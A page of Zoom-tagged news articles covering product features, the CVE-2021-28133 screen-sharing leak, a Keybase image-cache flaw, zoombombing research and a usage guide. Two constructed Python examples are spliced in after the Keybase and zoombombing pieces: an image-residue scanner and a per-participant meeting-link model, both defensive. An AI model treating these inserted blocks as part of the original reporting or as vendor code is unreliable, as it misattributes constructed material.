
Showing results for tags 'zoom'.


  1. Zoom launches Immersive View to unify participants in the same virtual room

     (Image: Zoom: Immersive View in a classroom)

     Zoom has officially launched a new immersive video feature to help businesses create more engaging and collaborative virtual meetings.

     While a growing number of fledgling startups have adopted remote-first mindsets from the get-go, the transition for larger enterprises is fraught with challenges, given that they may have hundreds of thousands of workers spread across multiple regions and time zones. Despite these hurdles, major businesses — including Salesforce, Microsoft, Shopify, VMware, Dropbox, and Fujitsu — have already confirmed a permanent shift to a remote-first or hybrid working policy. But better and more adaptable virtual collaboration tools will prove vital to the long-term success of these programs — Zoom fatigue is real, after all.

     Zoom first announced its new Immersive View (then called Immersive Scenes) feature at its annual Zoomtopia event back in October, positioning the technology against Microsoft Teams’ Together Mode, which had launched a few months before.

     In a nutshell, video call hosts can use Immersive View to arrange participants — anyone from employees to panelists — in a single virtual environment. This deviates from the established norm of displaying participants in a grid-like format with each individual’s personal background showing.

     (Image: Zoom: Immersive View for webinar panelist)

     Immersive View supports up to 25 participants, and they can be placed in any number of environments, including a boardroom, auditorium, or classroom, depending on the event. Hosts can manually move people around on the screen or let Zoom do it automatically.

     Immersive View is available now in Zoom’s desktop client (version 5.6.3 or higher) for Windows and MacOS and is activated by default for all free and individual Pro accounts.

     Source: Zoom launches Immersive View to unify participants in the same virtual room
  2. Zoom Screen-Sharing Glitch ‘Briefly’ Leaks Sensitive Data

     A glitch in Zoom’s screen-sharing feature shows parts of presenters’ screens that they did not intend to share – potentially leaking emails or passwords.

     A security blip in the current version of Zoom could inadvertently leak users’ data to other meeting participants on a call. However, the data is only leaked briefly, making a potential attack difficult to carry out.

     The flaw (CVE-2021-28133) stems from a glitch in the screen sharing function of video conferencing platform Zoom. This function allows users to share the contents of their screen with other participants in a Zoom conferencing call. They have the option to share their entire screen, one or more application windows or just one selected area of their screen.

     However, “under certain conditions” if a Zoom presenter chooses to share one application window, the share-screen feature briefly transmits content of other application windows to meeting participants, according to German-based SySS security consultant Michael Strametz, who discovered the flaw, and researcher Matthias Deeg, in a Thursday disclosure advisory (which has been translated via Google).

     “The impact in real-life situations would be sharing confidential data in an unintended way to unauthorized people,” Deeg told Threatpost.

     The current Zoom client version, 5.5.4 (13142.0301), for Windows is still vulnerable to the issue, Deeg told Threatpost.

     The issue occurs in a “reliably reproducible manner” when a user shares one split application window (such as presentation slides in a web browser) while opening other applications (such as a mail client) in the background, in what is supposed to be in non-shared mode. Researchers found the contents of the explicitly non-shared application window can be perceived for a “brief moment” by meeting participants.

     While this would only occur briefly, researchers warn that other meeting participants who are recording the Zoom meeting (either through Zoom’s built-in recording capabilities or via screen recording software like SimpleScreenRecorder) are able to then go back to the recording and fully view any potentially sensitive data leaked through that transmission.

     Because this bug would be difficult to actually intentionally exploit (an attacker would need to be a participant in a meeting where data is inadvertently leaked by the bug) the flaw is only medium-severity (5.7 out of 10) on the CVSS scale.

     However, “the severity of this issue really depends on the unintended shared data,” Deeg told Threatpost. “In some cases, it doesn’t matter, in other cases, it may cause more trouble.”

     For instance, if a conference or webinar panelist was presenting slides to attendees via Zoom, and then opened a password manager or email application in the background, other Zoom participants would be able to access this information.

     The vulnerability was reported to Zoom on Dec. 2 – however, as of the date of public disclosure of the flaw, on Thursday, researchers said they are “not aware of a fix” despite several inquiries for status updates from Zoom.

     “Unfortunately, our questions concerning status updates on January 21 and February 1, 2021, remained unanswered,” Deeg told Threatpost. “I hope that Zoom will soon fix this issue and my only advice for all Zoom users… is to be careful when using the screen sharing functionality and [to follow a] strict ‘clean virtual desktop’ policy during Zoom meetings.”

     Threatpost has reached out to Zoom for further comment regarding the flaw, and whether it will be fixed in the upcoming release that’s scheduled to go live March 22.

     “Zoom takes all reports of security vulnerabilities seriously,” a Zoom spokesperson told Threatpost. “We are aware of this issue, and are working to resolve it.”

     With the coronavirus pandemic driving more organizations to “flatten the curve” by going remote over the past year – and thus various web conferencing platforms – Zoom has been grappling with various security and privacy issues, including attackers hijacking online meetings in what are called Zoom bombing attacks.

     Other security issues have come to light in Zoom’s platform over the past year – such as one that could have allowed attackers to crack private meeting passcodes and snoop in on video conferences. However, Zoom has also taken important steps to secure its conferencing platform, including beefing up its end-to-end encryption and implementing other security measures.

     Source: Zoom Screen-Sharing Glitch ‘Briefly’ Leaks Sensitive Data
  3. Zoom to roll out ‘automatic closed captioning’ for all free accounts

     San Francisco: Video conferencing app Zoom said it is working towards making “automatic closed captioning” available for all the free account holders to make the service more accessible.

     “Among the Zoom Meetings accessibility features we offer to all users are manual closed captioning, keyboard accessibility, pinning or spotlighting interpreter video, screen reader support, and a range of accessibility settings,” the company said in a blogpost on Wednesday.

     “Now we are excited to announce that we are looking to take our efforts a step further and are working towards making automatic closed captioning available to all of our users in the fall of 2021,” it added.

     For a free user who needs access to the feature, the company is allowing users to manually request access to the Live Transcription feature via a Google Form.

     “To help free account holders who require Live Transcription, starting today and up until the feature’s broader release, we will also be offering automatic closed captioning to meeting hosts who need accommodation upon request,” according to the blogpost.

     Users need to enter their information in the form to sign up. Further, they will receive a confirmation email with more details.

     Automatic closed captions are also available with other video conferencing services like Google Meet.

     Recently, Zoom has added a feature “Studio Effects” that allows users to add a variety of eyebrows, facial hair and lip colour during live video streams.

     Source: Zoom to roll out ‘automatic closed captioning’ for all free accounts
  4. Exclusive: Flaws in Zoom’s Keybase App Kept Chat Images From Being Deleted

     A serious flaw in Zoom’s Keybase secure chat application left copies of images contained in secure communications on Keybase users’ computers after they were supposedly deleted.

     The flaw in the encrypted messaging application (CVE-2021-23827) does not expose Keybase users to remote compromise. However, it could put their security, privacy and safety at risk, especially for users living under authoritarian regimes in which apps like Keybase and Signal are increasingly relied on as a way to conduct conversations out of earshot of law enforcement or security services.

     The flaw was discovered by researchers from the group Sakura Samurai as part of a bug bounty program offered by Zoom, which acquired Keybase in May, 2020. Zoom said it has fixed the flaw in the latest versions of its software for Windows, macOS and Linux.

     Deleted…but not gone

     According to researcher John Jackson of Sakura Samurai, the Keybase flaw manifested itself in two ways. First: Jackson discovered that images that were copy and pasted into Keybase chats were not reliably deleted from a temporary folder, /uploadtemps, associated with the client application. “In general, when you would copy and paste in a Keybase chat, the folder would appear in (the uploadtemps) folder and then immediately get deleted,” Jackson told Security Ledger in a phone interview. “But occasionally that wouldn’t happen. Clearly there was some kind of software error – a collision of sorts – where the images were not getting cleared.”

     Discovering that flaw put Sakura Samurai researchers on the hunt for more and they soon struck pay dirt again. Sakura Samurai members Aubrey Cottle (@kirtaner), Robert Willis (@rej_ex) and Jackson Henry (@JacksonHHax) discovered an unencrypted directory, /Cache, associated with the Keybase client that contained a comprehensive record of images from encrypted chat sessions. The application used a custom extension to name the files, but they were easily viewable directly or simply by changing the custom file extension to the PNG image format, Jackson said.

     In a statement, a Zoom spokesman said that the company appreciates the work of the researchers and takes privacy and security “very seriously.”

     “We addressed the issue identified by the Sakura Samurai researchers on our Keybase platform in version 5.6.0 for Windows and macOS and version 5.6.1 for Linux. Users can help keep themselves secure by applying current updates or downloading the latest Keybase software with all current security updates,” the spokesman said.

     In most cases, the failure to remove files from cache after they were deleted would count as a “low priority” security flaw. However, in the context of an end-to-end encrypted communications application like Keybase, the failure takes on added weight, Jackson wrote.

     “An attacker that gains access to a victim machine can potentially obtain sensitive data through gathered photos, especially if the user utilizes Keybase frequently. A user, believing that they are sending photos that can be cleared later, may not realize that sent photos are not cleared from the cache and may send photos of PII or other sensitive data to friends or colleagues.”

     Messaging app flaws take on new importance

     The flaw takes on even more weight given the recent flight of millions of Internet users to end-to-end encrypted messaging applications like Keybase, Signal and Telegram. Those users were responding to onerous data sharing policies, such as those recently introduced on Facebook’s WhatsApp chat. In countries with oppressive, authoritarian governments, end to end encrypted messaging apps are a lifeline for political dissidents and human rights advocates.

     As a result of the flaw, however, adversaries who gained access to the laptop or desktop on which the Keybase application was installed could view any images contained in Keybase encrypted chats. The implications of that are clear enough. For example, recent reports say that North Korean state hackers have targeted security researchers via phishing attacks sent via Keybase, Signal and other encrypted applications.

     The flaws in Keybase do not affect the Zoom application, Jackson said. Zoom acquired Keybase in May to strengthen the company’s video platform with end-to-end encryption. That acquisition followed reports about security flaws in the Zoom client, including in its in-meeting chat feature.

     Jackson said that the Sakura Samurai researchers received a $1,000 bounty from Zoom for their research. He credited the company with being “very responsive” to the group’s vulnerability report.

     The increased use of encrypted messaging applications has attracted the attention of security researchers, as well. Last week, for example, a researcher disclosed 13 vulnerabilities in the Telegram secure messaging application that could have allowed a remote attacker to compromise any Telegram user. Those issues were patched in Telegram updates released in September and October, 2020.

     Source: Exclusive: Flaws in Zoom’s Keybase App Kept Chat Images From Being Deleted
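
A defender-side check for the condition described above, as an added example that is not from the article, Keybase or Sakura Samurai: it walks a directory and reports files whose leading bytes identify them as images, flagging those stored under a non-image extension. It goes beyond the PNG case in the article by also recognising JPEG and GIF; the temporary directory, the file names and the `.blob` extension are constructed, and only the folder names `uploadtemps` and `Cache` come from the article.

```python
import os
import tempfile

# Leading bytes ("magic numbers") that identify common image formats.
SIGNATURES = (
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
)
IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}


def sniff(path):
    """Return the image type indicated by the file's first bytes, or None."""
    with open(path, "rb") as fh:
        head = fh.read(8)
    for magic, kind in SIGNATURES:
        if head.startswith(magic):
            return kind
    return None


def residual_images(root):
    """List (relative_path, type, disguised) for every image found under root.

    disguised is True when the extension does not announce an image, which is
    the situation the article describes for the cache directory.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                kind = sniff(path)
            except OSError:
                continue  # unreadable file: skip it rather than abort the audit
            if kind is None:
                continue
            ext = os.path.splitext(name)[1].lower()
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            findings.append((rel, kind, ext not in IMAGE_EXTENSIONS))
    return sorted(findings)


def demo():
    """Build a constructed client data directory in a temp dir and audit it."""
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # header only, not a full image
    sample = {
        "uploadtemps/paste-1.png": png,          # pasted image never cleaned up
        "Cache/0001.blob": png,                  # cached copy, constructed extension
        "Cache/index.txt": b"not an image\n",    # ordinary file, must be ignored
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in sample.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        return residual_images(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```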
  5. Use Zoom’s new Studio Effects to liven up your boring meetings

     With an increasing number of people working or attending classes from home, video conferencing apps like Zoom and Google Meet have seen a strong surge in popularity over the last year. Due to the sheer number of alternatives available to end-users, developers are constantly innovating and adding new features to their respective apps to offer more value. For instance, Google Meet recently added a new ‘Green Room’ feature to help users check their audio and video settings before joining a call. Similarly, Zoom also added a new call end chime to the app to alert users when someone disconnected abruptly. While most of these new features aim to provide more utility, some are just added to make boring video calls more entertaining. Zoom’s new Studio Effects feature is a case in point.

     The feature gives you the ability to add several eyebrows, facial hair, and lip color filters to your video feed. According to a recent report from The Verge, it can be found within the “Background & Filters” option in Zoom’s Video Settings.

     (Image: The Verge)

     As you can see in the attached screenshot, it includes three tabs, labeled Eyebrows, Moustache & Beard, and Lip Color, that let you add quirky filters to your video feed. Zoom offers quite a few options to choose from, including 7 eyebrows types, 7 facial hair options, and 10 lip color variants, along with a custom color option that lets you pick a lip color that matches your outfit. You can also use the feature to change the color of your eyebrows and facial hair and even control the filter’s opacity.

     Additionally, the Studio Effects feature includes a toggle at the top to help you apply your preferred settings to all future meetings. But we’d recommend steering clear from it, for obvious reasons.

     It’s worth noting that while the Studio Effects feature was first announced back in September last year, many Zoom users have just discovered it in the app. The feature seems to be live for most Zoom users, but we’re not sure if it’s available globally.

     Source: Use Zoom’s new Studio Effects to liven up your boring meetings
  6. Zoombombing countermeasures are ineffective in the vast majority of cases

     Password-protecting meetings is among the most ineffective protections.

     As the COVID-19 pandemic forced schools, colleges, and businesses to limit in-person meetings, the world quickly adopted video conferencing from services such as Zoom and Google Meet. That, in turn, gave way to "zoombombing," the term for when Internet trolls join online meetings with the goal of disrupting them and harassing their participants. Meeting services have adopted a variety of countermeasures, but a new research paper finds that most of them are ineffective.

     The most commonly used countermeasures include password-protecting meetings, using waiting rooms so that conference organizers can vet people before allowing them to participate, and counseling participants not to post meeting links in public forums.

     The problem with these approaches is that they assume the wrong threat model. One common assumption, for instance, is that the harassment is organized by outsiders who weren’t privy to meeting details. Researchers at Boston University and the State University of New York at Binghamton studied zoombombing calls posted on social media for the first seven months of last year and found that wasn’t the case in most instances.

     In a paper titled A First Look at Zoombombing, the researchers wrote:

         Our findings indicate that the vast majority of calls for zoombombing are not made by attackers stumbling upon meeting invitations or bruteforcing their meeting ID, but rather by insiders who have legitimate access to these meetings, particularly students in high school and college classes. This has important security implications, because it makes common protections against zoombombing, such as password protection, ineffective. We also find instances of insiders instructing attackers to adopt the names of legitimate participants in the class to avoid detection, making countermeasures like setting up a waiting room and vetting participants less effective. Based on these observations, we argue that the only effective defense against zoombombing is creating unique join links for each participant.

     The researchers reached their findings by analyzing posts on Twitter and 4chan.

     A vexing problem

     Zoombombing has been a concern for schools, universities, and other groups that have adopted video conferencing. At an August court hearing for a Florida teen accused of hacking Twitter, for instance, zoombombers interrupted the proceedings to hurl racial slurs and display pornographic videos. A Zoom conference hosting students from the Orange County Public Schools system in Florida was disrupted after an uninvited participant exposed himself to the class.

     The outrage that events like these cause has prompted online meeting services to adopt measures designed to counter the harassment. Many publications, Ars included, have also provided posts explaining how meeting organizers can prevent zoombombing. Countermeasures typically include:

       • Making sure meetings are password protected
       • When possible, not announcing meetings on social media or other public outlets
       • Using the Waiting Room option to admit participants

     The problem with these measures is that they don’t work well or at all when zoombombing is organized by insiders who have authorization to join a meeting. Anyone who’s authorized to join a meeting will obviously have a meeting password that they can then share with others.

     Requiring participants to be vetted in a waiting room before they can join a meeting is only slightly more effective, since “insiders often share additional information with potential attackers, for example instructing them to select names that correspond to legitimate participants in the meeting,” the researchers wrote. “This reduces the effectiveness of a waiting room, because it makes it more difficult for hosts and moderators to identify intruders.” What’s more, vetting people before admitting them often doesn’t scale for meetings with large numbers of users, making that option infeasible for many.

     Another half-measure is providing a unique link for each participant. It won’t stop zoombombing if the meeting service still allows more than one person to join with the same link, but it does help the organizer to more easily identify the insider who provided the link to outsiders.

     The researchers wrote:

         An even better mitigation is to allow each participant to join using a personalized meeting link. This way, as long as the insider joins the meeting, unauthorized people will not be able to join using the same link. While this mitigation makes zoombombing unfeasible, not all meeting services have adopted it. At the moment of writing, only Zoom and Webex allow per-participant links that allow a single user to join at a time. To do this, Zoom requires participants to log in, and checks if the unique link is the same that was sent to that email address as a calendar invite. We encourage other meeting platforms to adopt similar access control measures to protect their meetings from insider threats.

     The researchers said their work is the first data-driven analysis of calls for zoombombing attacks made on social media. Given the continued and growing reliance on video conferencing, it’s not likely to be the last.

     Source: Zoombombing countermeasures are ineffective in the vast majority of cases
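
The access-control argument above, as an added example that is not from the article or the research paper: a small Python model contrasting a shared meeting password with per-participant links that are bound to the invitee's login and limited to one session at a time. `MeetingGate`, the `meet.example` URL, the HMAC link format and all e-mail addresses are assumptions constructed for illustration, not any meeting service's real API.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit


class MeetingGate:
    """Join policy for one meeting (constructed model, hypothetical names)."""

    def __init__(self, meeting_id, invitees, password):
        self.meeting_id = meeting_id
        self.invitees = set(invitees)
        self.password = password
        self.key = secrets.token_bytes(32)  # server-side secret, never sent out
        self.active = set()                 # invitees currently in the meeting
        self.leak_suspects = set()          # invitees whose link someone else used

    def tag(self, email):
        # The MAC binds a link to this meeting AND to one invitee.
        msg = f"{self.meeting_id}|{email}".encode()
        return hmac.new(self.key, msg, hashlib.sha256).hexdigest()

    def issue_link(self, email):
        if email not in self.invitees:
            raise ValueError(f"{email} is not invited")
        query = urlencode({"u": email, "t": self.tag(email)})
        return f"https://meet.example/j/{self.meeting_id}?{query}"

    def join_with_password(self, display_name, password):
        # Weak baseline: the secret is shared and the display name is free
        # text, so whoever an insider forwards the password to is admitted.
        return hmac.compare_digest(password.encode(), self.password.encode())

    def join_with_link(self, link, logged_in_as):
        params = parse_qs(urlsplit(link).query)
        email = params.get("u", [""])[0]
        presented = params.get("t", [""])[0]
        expected = self.tag(email)
        if email not in self.invitees or not hmac.compare_digest(
            presented.encode(), expected.encode()
        ):
            return (False, "bad-signature")
        if logged_in_as != email:
            # A valid link used from another account names the invitee who
            # passed it on; this is the attribution benefit of unique links.
            self.leak_suspects.add(email)
            return (False, "identity-mismatch")
        if email in self.active:
            return (False, "already-joined")  # one session per invitee
        self.active.add(email)
        return (True, "admitted")


def demo():
    """Run the scenarios from the article on constructed participants."""
    gate = MeetingGate("cs101", ["alice@example.edu", "bob@example.edu"], "hunter2")
    alice_link = gate.issue_link("alice@example.edu")
    return {
        "outsider_with_password": gate.join_with_password("Bob", "hunter2"),
        "alice": gate.join_with_link(alice_link, "alice@example.edu"),
        "outsider_with_leaked_link": gate.join_with_link(alice_link, "mallory@example.net"),
        "second_session": gate.join_with_link(alice_link, "alice@example.edu"),
        "leak_suspects": sorted(gate.leak_suspects),
    }


if __name__ == "__main__":
    for scenario, outcome in demo().items():
        print(scenario, outcome)
```

The password check admits the outsider who borrows a legitimate name, while the link check rejects the same outsider and records whose invitation was passed on.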
  7. How To Install Zoom On Linux?

     The easiest way to install Zoom on Linux

     The pandemic has had a huge impact on our lives and how we interact with people. Thankfully, technology has played an enormous part in helping us stay connected in these tough times. One of the essential pieces of software that gained a lot of traction during the pandemic is Zoom. In this article, let’s look at how you can install Zoom on Linux PC.

     Install Zoom On Linux

     1. From The Official Website

     Installing Zoom on Linux is as easy as installing it on Windows. All you need to do is –

     Download Zoom

     Head over to the official Zoom download page by clicking here.

     Select the options

     In the Linux Type dropdown menu, select the distribution you’re running, select the OS Architecture (32/64-bit), and the distro version that you’re running. If you don’t know what distro you have installed, open the settings, and you’ll probably see an About option where you’ll find all the information about the distro.

     I’ll download Zoom for Ubuntu as I’m using an Ubuntu-based Linux Distro Pop!_OS.

     Install Zoom

     You can easily install Zoom in Linux Debian, Ubuntu and Ubuntu-based distros, Oracle Linux, CentOS, RedHat, Fedora, and OpenSUSE. All you need to do is download the .deb or .rpm installer and double-click to install.

     Installing Zoom on Arch Linux/Arch-based distros

     Download the Zoom binary, open the terminal, and enter the following command.

         sudo pacman -U zoom_x86_64.pkg.tar.xz

     2. Install Zoom On Linux Using Snap

     Zoom can also be installed using Snap. Snap comes pre-installed on almost all the distros, and to check if it’s installed on your Linux PC, just type snap --version and the output will look something like this.

         $ snap --version
         snap    2.48.2
         snapd   2.48.2
         series  16
         pop     20.10
         kernel  5.8.0-7630-generic

     If you don’t see the above output, you don’t have Snap installed. To install Zoom snap, enter the following command.

         sudo apt install snapd
         sudo snap install zoom-client

     Wait patiently as snap installations take time. Voila! Zoom should now be installed on your PC. Open the apps list and fire up Zoom to start using it.

     How To Uninstall Zoom?

     To uninstall Zoom on Ubuntu/Debian distros, open the terminal, enter the following command, and hit enter.

         sudo apt remove zoom

     In openSUSE, open the terminal and type this command, and hit enter.

         sudo zypper remove zoom

     The command to uninstall Zoom on Oracle Linux, CentOS, RedHat, or Fedora is

         sudo yum remove zoom

     Faced any issues following the above instructions? Let us know in the comments section below.

     Source: How To Install Zoom On Linux?
  8. A new app allows teachers to use their iPhone or iPad as an overhead camera on Zoom

     It’s designed to help teachers who are teaching from home due to COVID

     Teachers who have found themselves holding class over Zoom have probably already figured out clever hacks to show their students documents, but there’s now an app designed specifically for that purpose (via 9to5Mac). Overviewer was made by developer Charlie Chapman, and it allows teachers (or anyone, really) to easily use their phone’s camera as a replacement for an overhead document viewer.

     If it’s been a minute since you were a student, or if your school didn’t have these overhead devices, they’re basically webcams pointing straight down that allow teachers to show students a printed document, book, hand drawing, or other piece of writing or image. It’s a useful ability to have, but many teachers are working from home because of COVID and may not have access to one like they would in the classroom.

     Participants in the Zoom call only see what your phone’s camera sees.

     Overviewer works as a replacement by taking advantage of Zoom’s built-in screen sharing feature that works with the iPhone when it’s connected to a computer with a Lightning cable, or wirelessly through AirPlay (at the moment, it doesn’t seem like Zoom offers this feature for Android users). It shows a feed from your phone’s camera on the screen, with nothing else getting in the way. The feature also offers the ability to turn your phone’s flashlight on if your lighting situation isn’t ideal, as well as the option to change which camera is being displayed.

     In a heartwarming blog post about how he developed the app for his wife, who works as a kindergarten teacher, Chapman explains how he saw his wife using iOS’s built-in camera app to do the same thing, and how she was frustrated by the lack of landscape support and all the buttons overlaid on-screen:

         So being the dorky husband that I am, I quickly built an app that does nothing other than show what the phone camera sees with zero chrome, and properly rotates the whole app so that you can share it in landscape on zoom. This did the trick and she actually used it! It’s pretty tailor made for exactly my wife’s use case but I would think that would be a pretty common one for teachers to be in right now in our current virtual teaching world.

     If you’re a teacher, or are thinking of some other use for the app, it’s available for free on the App Store. It’s worth noting that if you’re using a Mac, Zoom will ask for permission to record your screen and have to be restarted in order to share your phone’s screen (this is because Zoom is just displaying your phone’s screen on your computer, and then capturing that window).

     For more information on how the app works, the developer has made a how-to video, which you can watch below.

     Source: A new app allows teachers to use their iPhone or iPad as an overhead camera on Zoom
  9. The complete Zoom guide: From basic help to advanced tricks Video conferencing has never been so critical to our work and personal lives. Here's everything you need to make your meetings more productive. Offices closed. Travel was restricted. Employers scrambled to knock together hasty virtual setups and access to corporate networks for workers required to work from home. At the beginning of 2020, few predicted that the spread of COVID-19 would have such an effect on our daily lives, our work environments, and day-to-day business operations. In the new year, little has changed. As the coronavirus outbreak spread worldwide, we became reliant on our household internet connections to keep working. There are many freelancers and contractors out there who are used to remote work; however, countless employees once based in the office are now left to master the tools available for teleconferencing on their own. Once, Skype was a key tool for communicating remotely. However, Microsoft's software has been overtaken by Zoom, a video communications platform that many of us at ZDNet consider easier to use, more lightweight, and without the same spam problems. One of Zoom's key strengths is its simplicity, but this does not mean that the platform is without a variety of advanced features that remote workers will find useful for improving their productivity. Below, we'll show you how to get started, and also offer some tips and tricks that experienced users may be missing out on. LET'S GET STARTED: ZOOM BASICS First of all, head over to Zoom in your browser. The platform is compatible with Windows, Mac, Linux, iOS, and Android. The layout will be slightly different depending on whether you are on desktop or mobile. 
There are four plans available; the most popular now likely being the free tier, in which virtual meetings can be held with up to 100 participants, 1-on-1 meetings without a time limit are possible, and meetings with multiple participants can be held for up to 40 minutes. (When your time is up, you can simply restart a meeting if need be.) The free option also allows users to conduct meetings in HD video and with audio, participants can join via their PC or a telephone line, and both desktops and apps can be shared. Zoom's Pro, Business and Enterprise packages come with additional features, including an increase in meeting duration limits, cloud recording and storage, Skype for Business interoperability, single sign-on options, and company branding. It is possible to join a meeting just from your browser, but in the interests of longevity and avoiding browser limitations, you should download the application. To start using Zoom, make your choice (browser or a direct download) and then sign up. You will be prompted to type in your work email -- but any will do -- or sign in through either Google or Facebook. At the next prompt, Zoom will ask for permission to send resources including product videos and how-to guides your way. Either click "confirm" or "Set Preferences;" the latter option being to receive emails once a week, once a month, or never. Make your selection. By now, a confirmation email should have landed in your inbox. Open the message, click "Activate Account" or paste the included confirmation link into your browser, and then at the next prompt, you will need to complete account creation with your name and a strong password. If you wish, on the next screen, you can invite your colleagues to also create an account. If not, click "Skip this step." Now you can choose to create a test meeting if you like, as well as add Zoom as an extension. 
There are various plugins available including a Google Chrome extension, Mozilla Firefox extension, Microsoft Outlook plugin, and IBM Notes plugin. If you will be using Zoom for the foreseeable future for work purposes, you may want to select and install appropriate add-ons now. Once you've launched your test meeting, you will be met with a screen similar to below, containing the meeting's URL and the option to invite others. We will go through the core features of the meeting system in a moment, but for now, let's head over to the web portal, zoom.us, to make sure that the correct settings are enabled -- and that you know how to create and launch a meeting. THE WEB PORTAL On the Zoom website, head to "Your Account" in the top-right to manage your profile. You can change details under the "Profile" tab such as your name, picture, default meeting ID, password and time zone. Next, head to "Settings." Here, you can adjust settings implemented by default, including whether or not video is automatically enabled when you -- or participants -- join a meeting; and whether or not participants can join a scheduled meeting before the host arrives. In the interests of security and to prevent scammers from hijacking a meeting, you should make sure you use strong passwords. Passwords were not always enabled by default, but after Zoom founder Eric Yuan apologized for "falling short of the community's -- and our own -- privacy and security expectations," a rush of security changes were made, including the enabling, by default, of passwords for scheduled, instant, and personal meetings. Next up is audio type. You can pick telephone and computer audio or one or the other to be automatically permitted. However, given the rapid rise of users, Zoom has warned: "Due to increased demand, dial-in by phone audio conferencing capabilities may be temporarily removed from free Basic account[s]. During this time, we strongly recommend using our computer audio capabilities." 
You can also decide whether or not to allow public and private chats when you host a meeting; you can give permission for files to be transferred, and who can share their screen -- just the host, or participants, too. There are other, more advanced controls, but these are the main settings you should be aware of for now. The Zoom desktop app has a similar layout, with "Settings" accessible from the top-right corner. The options you can access here are related to your PC, such as whether or not you want to use dual monitors or automatically enter a full-screen mode when a meeting starts. You can also test your microphone and speaker setup, choose a color theme, select a default location for recordings, and tweak accessibility controls, among other functions. With your basic preferences in place, let's go to the "Meetings" tab in your profile.

SCHEDULING AND HOSTING A MEETING
The first screen you will see reveals any scheduled meetings in your diary. Click "schedule a new meeting" and a new screen will appear, in which you can name your meeting, add a description if you want, and choose the date or time. If this is to be a continual meet up with colleagues, there is a handy "recurring meeting" checkbox under the timezone tab. If you select it, you can then choose how often the meeting needs to be repeated -- whether daily, weekly, or monthly. Once you have input these details, scroll down and click "save."

THE MEETING IS SET, BUT HOW DO YOU INVITE OTHERS?
The short answer is: you must do so manually. There are two ways to do this: through calendar invites, or via your own email account. If you wish to invite others through a calendar, links to Google Calendar, Outlook Calendar, and Yahoo Calendar are displayed once your meeting has been saved. Alternatively, next to the "join URL" link on this screen, there is an option to "copy this invitation."
Clicking on this page element brings up a screen with all of the important information required for the meeting, including the URL, in which the meeting ID is already embedded. Copy this to your clipboard, open your email client, paste the details into a new message, and invite away. So, in short, all participants need is the meeting URL, date and time, and a password if applicable. If you want to try out features before bringing other people in, create a test meeting at this stage and select "Start this meeting." Alternatively, you can do exactly the same within the first page of the Zoom desktop app. The first prompt, in either case, will ask you to join with computer audio if you are on PC, and will also give you the option to test your speaker and microphone. At the top right of the meeting window, you can choose to go full screen. We are now going to go over the basic settings you need to know about in meetings for management purposes. Two fundamental options can be found in the bottom-left part of the black menu tab: the option to mute/unmute your microphone and either start/stop your camera. If you are using an external microphone, speaker, or camera, open up the arrow tabs next to these options to choose which equipment you want to use (external or inbuilt). Moving on, the "Manage Participants" tab is particularly important. Under this tab, you can find "invite," which is useful if you've forgotten to bring someone into a session. Clicking this option will bring up a box with everyone connected to the meeting. If you hover over a name, you can mute/unmute them, and at the bottom, there are options for doing the same for every participant. In the interests of privacy, however, hosts and other participants cannot control individual camera feeds. A handy feature to note here under "More" is "lock," which stops anyone else from joining an active session.
Speaker or Gallery view: At the top, you can pick one of two view options -- but this only impacts how you view a meeting, and not others. Active Speaker is the default video layout -- in which the person talking is ramped up to a larger screen -- but there is also a gallery layout that brings in every participant on one screen through a grid. The "Share Screen" tab has a number of interesting features. When selected, under "Basic," you can choose to share your PC screen with others, including your full desktop, browser, or open applications. There is also a whiteboard option that can be annotated -- we will talk about this more shortly -- and it is possible to share iPhone screens if you are on the move, too. Under "Advanced," you can share a screen portion, music or sound only, or content from a second, connected camera. There is also a file-sharing tab under "share screen" (shown under "Files"), which includes application links to Dropbox, Microsoft OneDrive, Google Drive, and Box. As a host, you can also use the arrow next to the "Share Screen" tab to control whether participants are limited to one screen share at a time, or alternatively, you can give permission for multiple screens to be shared at once. Now, let's talk about messaging. The "Chat" tab on the main bar is designed for users to type out questions and messages, as well as share files either hosted by cloud storage providers or stored directly on your PC. As a host, you can also select the "..." button to save a chat session and control who participants can talk to -- no one, the host alone, everyone publicly, or everyone publicly and privately. The final tab of note is the "Record" option, which you may want to use if you are discussing work matters and want to save the session in order to email a copy of it to others later. By default, no one except the host can record a session unless the host gives permission to do so.
(More: Check out TechRepublic's guide to recording Zoom meetings.) Finally, the "End Meeting" tab finishes the session. If the host needs to leave but the meeting should carry on, they can assign the host status to another participant -- but enabling co-hosts has to be selected first in the "Meetings" tab and can only be selected by subscription holders. Alternatively, you can leave the meeting or end the meeting for all.

THE SECURITY TAB
The company added a "Security" icon for meeting hosts to more easily access settings including lock, waiting room, and remove participants. Under this tab, scattershot security settings are now clustered together. This includes the "lock meeting" function, whether or not to enable the "waiting room," and participant control -- allowing or disabling screen sharing, chat functions, renaming, and annotating. In addition, you can quickly remove gatecrashers or disruptive participants.

ADVANCED TIPS AND TRICKS
Now that the basics have been covered, there is a range of settings and features that more experienced users might want to use. Let's head back over to the web portal to run through a few options. If you are using the desktop application, you can quickly access this area by going to "Settings" --> "View More Settings." Under "Settings," select "In Meeting: Advanced," to find features including:
  • Breakout room: split meeting participants into separate, smaller rooms. This can also be done before a meeting begins to prevent logistical problems
  • Remote support: allows a host to provide 1:1 support to a participant
  • Camera control: you can allow a participant to take remote control of your camera
  • Show a "Join from your browser" link: a workaround for users that can't download Zoom software
  • Invitation languages: You can choose from a variety of languages for meeting invitations, including English, Spanish, French, and Russian.
  • Virtual backgrounds: enabling/disabling
  • Waiting room: a feature to keep participants in a 'waiting area' until the host is ready for them -- particularly handy for remote interviews or office hours. This feature is now on as default for education, Basic, and single-license Pro accounts.

WEBINARS
